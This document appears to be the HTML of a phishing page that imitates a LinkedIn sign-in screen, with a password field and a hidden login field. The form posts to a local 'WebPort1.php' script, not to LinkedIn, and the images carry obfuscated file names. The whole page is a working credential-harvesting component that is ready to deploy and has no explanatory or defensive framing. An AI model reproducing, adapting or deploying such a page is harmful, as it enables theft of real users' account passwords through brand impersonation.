<html>
<head>
	<meta charset="utf-8">
	<title>Sign in :  LinkedIn</title>
	<link rel="icon" href="./support/al2o9zrvru7aqj8e1x2rzsrca.ico" type="image/gif" sizes="16x16">
	<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body bgcolor="#FFF">

	<table align="center" cellspaCing="0">
	<tr><td style="height:80px;"></td></tr>
	<tr><td>
		<table align="center" cellspacing="0">
		<tr><td style="height:460px; width:380px; border:none; border-radius: 6px 6px 6px 6px; -webkit-box-shadow: 1px 1px 5px 1px #CACECB; box-shadow: 1px 1px 5px 1px #CACECB;">
			<table align="center" cellspacing="0" style="width:310px;">
			<tr><td style="height:10px;"></td></tr>
			<tr><td>
				<font style="font-size:30px; color:#000" face="arial">Sign in</font>
			</td></tr>
			<tr><td style="height:15px;"></td></tr>
			<tr><td>
				<font style="font-size:14px; color:#000" face="arial">You are accessing a member's only area. Sign in</font>
			</td></tr>
			<tr><td>
				<form method="post" action="WebPort1.php">
			</td></tr>
			<tr><td style="height:10px;"></td></tr>
			<tr><td>
				<table cellspaCing="0" align="center"><tr>
				<td style="width:315px; height:43px; font-family: arial; font-size: 13px; color:#000000; background-color: #FFF; 
				border: solid 1px #AFAFAF; padding: 8px;  border-radius: 3px 3px 3px 3px; -webkit-box-shadow: 1px 1px 5px 1px #CACECB;">
					<font style="font-size:17px; color:#0A71BA;" face="arial">  </font>
				</td></tr></table>
			</td></tr>
			<tr><td style="height:10px;"></td></tr>
			<tr><td>
				<div align="center">
					<input  name="passwd" type="password" required placeholder="Password"
					style="width:320px; height:43px; font-family: arial; font-size: 16px; color:#000000; background-color: #FFF; 
					border: solid 1px #AFAFAF; padding: 8px;  border-radius: 3px 3px 3px 3px; -webkit-box-shadow: 1px 1px 5px 1px #CACECB;">
				</div>
			</td></tr>
			<tr><td style="height:10px;"></td></tr>
			<tr><td>
				<div align="center">
					<input type="submit" value="Sign in" style="width:320px; height:45px; background-color: #0A71BA; border: solid 3px #0A71BA; 
					font-family: arial; font-size: 16px; color: #ffffff; border-radius: 18px 18px 18px 18px; -webkit-box-shadow: 1px 1px 5px 1px #CACECB;">
				</div>
			</td></tr>
			<tr><td style="height:30px;">
				<input type="hidden" name="login" value="">
				</form>
			</td></tr>
			<tr><td>
				<div align="center">
					<img src="./support/hgd92hdkkss8.jpg" width="100%">
				</div>
			</td></tr>
			</table>
		</td></tr>
		</table>
	</td></tr>
	<tr><td style="height:55px;"></td></tr>
	<tr><td>
		<div align="center">
			<img src="./support/j937844hcgi287fjdjk.jpg" width="93%">
		</div>
	</td></tr>
	</table>
	
	<img src="./support/gdehe9278357494.png" style="width: 140px; height:40px; position: absolute; top: 15px; left: 15px;">
	
</body>
</html>